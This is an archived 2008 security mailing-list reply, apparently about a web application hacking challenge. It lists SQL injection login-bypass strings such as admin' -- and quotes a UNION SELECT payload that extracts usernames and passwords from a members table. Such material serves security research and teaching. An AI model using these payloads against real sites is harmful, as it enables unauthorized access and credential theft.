|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Vivek P (iamherevivek
gmail.com)
Date: Sun Sep 07 2008 - 05:34:30 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Jorge,
I think misdirection was a little arbit!
Normal User access (no user creation needed / could shut down DB!!)
'--
' --/*
Admin
admin' --
admin' -- /*
Thanks
On Sun, Sep 7, 2008 at 4:25 AM, GulfTech Security Research
<securitygulftech.org> wrote:
>
> Hi Jorge,
>
> Did you say the cookie bit to throw people off? I notice that basically the cookie is using an md5'ed version of the username as the id, and I get that, but I actually got in by using the username "admin' -- /*" and the password "1".
>
> Also, I have been able to exploit the search feature to get this information also by sending a query like this.
>
> -99' UNION SELECT 1,2,username,password,5 FROM members -- /*
>
> Kind Regards,
>
> James
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Top 5 Common Mistakes in Securing Web Applications
> Get 45 Min Video and PPT Slides
>
> www.cenzic.com/landing/securityfocus/hackinar
> ------------------------------------------------------------------------
>
--
Regards
Vivek P Nair
VP Technology
Appin Software Security Private Limited
d3dbr1n - I though i would change the world, they wouldnt gimme the
source code!!
Three ways to gain Success
1. know more than others
2. work more than others
3. expect less than others
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Top 5 Common Mistakes in
Securing Web Applications
Get 45 Min Video and PPT Slides
www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]